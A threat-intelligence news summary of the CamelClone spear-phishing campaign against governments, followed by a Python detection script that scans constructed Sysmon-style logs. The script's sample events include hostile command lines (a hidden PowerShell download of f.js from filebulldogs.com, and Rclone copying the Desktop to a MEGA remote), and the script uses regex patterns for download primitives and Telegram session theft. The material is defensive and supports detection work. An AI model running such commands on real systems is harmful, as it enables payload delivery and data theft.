Threat Intel · HIGH

CamelClone Spy Campaign - Targeting Governments Worldwide

Cyber Security News · Reporting by Tushar Subhra Dutta
Summary by CyberPings Editorial · AI-assisted · Reviewed by Rohit Rana

Basically, a spy group is tricking government workers into downloading harmful files to steal sensitive information.

Quick Summary

A new spy campaign, Operation CamelClone, is targeting government agencies globally. Using spear-phishing tactics, attackers aim to steal sensitive data. Organizations must enhance their security measures to mitigate this threat.

The Threat

Operation CamelClone is a sophisticated espionage campaign that has emerged as a significant threat to government agencies and defense institutions across various countries. The campaign has been active since late February 2026, targeting nations like Algeria, Mongolia, Ukraine, and Kuwait. The attackers use spear-phishing emails that contain malicious ZIP files disguised as official government correspondence. This tactic is particularly concerning as it exploits the trust that individuals have in official communications.

The campaign's first notable incident involved a ZIP file mimicking Algeria’s Ministry of Housing, which was uploaded to VirusTotal. As the operation progressed, additional samples were identified, each cleverly themed to resonate with the targeted nation’s interests. For example, one email referenced cooperation with China, while another focused on defense procurement for Kuwait’s Air Force. This careful selection of targets indicates that the attackers are motivated by intelligence gathering rather than financial gain.

Who's Behind It

The attackers behind Operation CamelClone remain anonymous, but their methods reveal a high level of sophistication. They utilize a multi-stage infection chain that begins with a Windows shortcut file embedded in the malicious ZIP archive. Once the victim opens this file, a PowerShell command executes in the background, pulling additional malicious payloads from a public file-sharing platform. This technique allows them to avoid detection by traditional security measures, as they do not rely on dedicated command-and-control servers.

By hosting their malicious content on platforms like filebulldogs[.]com and routing stolen data through MEGA cloud storage, they effectively blend their activities with normal internet traffic. This makes it challenging for organizations to monitor and identify suspicious behavior, further complicating defense efforts.

Tactics & Techniques

The infection process initiated by the CamelClone campaign is intricate. After the initial PowerShell command runs, it downloads a JavaScript file named f.js, which executes further malicious actions. This includes downloading a decoy PDF to distract the victim while simultaneously uploading sensitive files from the victim’s system to the attacker’s MEGA account.

The use of Rclone, a legitimate cloud file transfer tool, is particularly alarming. The attackers leverage this tool to sweep the victim’s Desktop for documents and even target Telegram session data, potentially exposing private conversations. The attackers have registered multiple MEGA accounts to facilitate their operations, indicating a well-planned strategy to maintain anonymity.

Defensive Measures

Organizations, especially those in government and defense sectors, must take proactive measures against such sophisticated attacks. Caution is key when dealing with unsolicited ZIP files, particularly those that reference official institutions. Implementing strict access controls to anonymous file-sharing platforms can significantly reduce exposure.

Additionally, monitoring outbound traffic to cloud storage services like MEGA is crucial. Employing behavior-based endpoint detection tools can help identify and stop the execution of malicious scripts before they can complete their objectives. By remaining vigilant and informed, organizations can better protect themselves against the evolving landscape of cyber espionage.
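The following is an added example, not code from the original article or from the summary's authors. It implements the behaviour-based checks the Defensive Measures section calls for and runs them over constructed Sysmon-style process-creation (EventID 1) and network-connection (EventID 3) events that mirror the chain described under Tactics & Techniques: a hidden PowerShell downloader launched from the shortcut, a dropped f.js run by the script host, and an Rclone sweep of the Desktop into a MEGA remote. Only filebulldogs[.]com, f.js, Rclone and MEGA come from the page; the MEGA hostnames, the command-line patterns, the browser allowlist and every sample log line are assumptions constructed for illustration.

```python
import json
import re
from pathlib import PureWindowsPath

# Infrastructure named in the summary (filebulldogs[.]com, MEGA). The MEGA hostnames,
# the browser allowlist and the patterns below are assumptions for this example.
FILE_SHARING_HOSTS = {"filebulldogs.com"}
CLOUD_STORAGE_HOSTS = {"mega.nz", "mega.co.nz"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}

DOWNLOAD_PRIMITIVE = re.compile(
    r"invoke-webrequest|\biwr\b|\bcurl\b|downloadstring|downloadfile|net\.webclient",
    re.IGNORECASE)
STEALTH_FLAGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|-executionpolicy\s+bypass", re.IGNORECASE)
SENSITIVE_PATHS = re.compile(r"\\desktop\b|\\tdata\b", re.IGNORECASE)  # user documents, Telegram session


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path ('' if the path is empty)."""
    return PureWindowsPath(image).name.lower()


def check_process(ev: dict) -> list[str]:
    """Return the alert names triggered by one process-creation event."""
    alerts = []
    image, parent = basename(ev["Image"]), basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    # Stage 1: the opened shortcut makes Explorer spawn a hidden PowerShell that fetches
    # a payload; require a download primitive plus stealth flags or a file-sharing host.
    if image == "powershell.exe" and parent == "explorer.exe" and DOWNLOAD_PRIMITIVE.search(cmd):
        if STEALTH_FLAGS.search(cmd) or any(h in cmd.lower() for h in FILE_SHARING_HOSTS):
            alerts.append("lnk_powershell_downloader")
    # Stage 2: Windows Script Host executing a .js dropped into a user-writable location.
    if image in {"wscript.exe", "cscript.exe"} and re.search(
            r"\\(temp|appdata)\\.*\.js\b", cmd, re.IGNORECASE):
        alerts.append("script_host_dropped_js")
    # Stage 3: Rclone copying to a MEGA remote or sweeping Desktop / Telegram session data.
    if image == "rclone.exe" and re.search(r"\b(copy|sync|move)\b", cmd, re.IGNORECASE):
        if re.search(r"\bmega", cmd, re.IGNORECASE) or SENSITIVE_PATHS.search(cmd):
            alerts.append("rclone_cloud_exfil")
    return alerts


def check_network(ev: dict) -> list[str]:
    """Return the alert names triggered by one network-connection event."""
    host = ev.get("DestinationHostname", "").lower()
    image = basename(ev["Image"])

    def in_set(hosts):
        return any(host == h or host.endswith("." + h) for h in hosts)

    # Outbound cloud-storage traffic is normal from a browser, suspicious from anything else.
    if in_set(CLOUD_STORAGE_HOSTS) and image not in BROWSERS:
        return ["nonbrowser_cloud_storage_egress"]
    if in_set(FILE_SHARING_HOSTS):
        return ["file_sharing_site_contact"]
    return []


def scan(lines) -> list[tuple[str, str]]:
    """Run each JSON log line through the check for its event type; return (image, alert) pairs."""
    findings = []
    for line in lines:
        ev = json.loads(line)
        if ev["EventID"] == 1:
            alerts = check_process(ev)
        elif ev["EventID"] == 3:
            alerts = check_network(ev)
        else:
            alerts = []
        findings.extend((basename(ev["Image"]), a) for a in alerts)
    return findings


# Constructed sample telemetry (not real logs); raw strings keep the JSON backslash escapes intact.
SAMPLE_LOG = [
    r'{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -w hidden -nop -c iwr https://filebulldogs.com/d/f.js -OutFile $env:TEMP\\f.js"}',
    r'{"EventID": 3, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "DestinationHostname": "filebulldogs.com"}',
    r'{"EventID": 1, "Image": "C:\\Windows\\System32\\wscript.exe", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\f.js"}',
    r'{"EventID": 1, "Image": "C:\\Users\\u\\AppData\\Local\\Temp\\rclone.exe", "ParentImage": "C:\\Windows\\System32\\wscript.exe", "CommandLine": "rclone.exe copy C:\\Users\\u\\Desktop mega:in --include *.docx"}',
    r'{"EventID": 3, "Image": "C:\\Users\\u\\AppData\\Local\\Temp\\rclone.exe", "DestinationHostname": "g.api.mega.co.nz"}',
    # Benign events that must stay quiet: an admin listing files, a browser visiting MEGA.
    r'{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -c Get-ChildItem C:\\Users\\u\\Desktop"}',
    r'{"EventID": 3, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "DestinationHostname": "mega.nz"}',
]

if __name__ == "__main__":
    for image, alert in scan(SAMPLE_LOG):
        print(f"{alert:36s} {image}")
```

Each stage of the chain is matched on behaviour (parent/child relationship, download primitive, script host reading from a temp path, Rclone verb plus remote) rather than on a file hash, so the checks keep working when the payload names or hosting site change; the network rule pairs a destination with the originating process, which is what separates an Rclone upload to MEGA from an employee using the same service in a browser.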

🔒 Pro insight: The use of legitimate cloud tools like Rclone in espionage highlights the need for advanced detection mechanisms in endpoint security.

Original article from Cyber Security News · Tushar Subhra Dutta
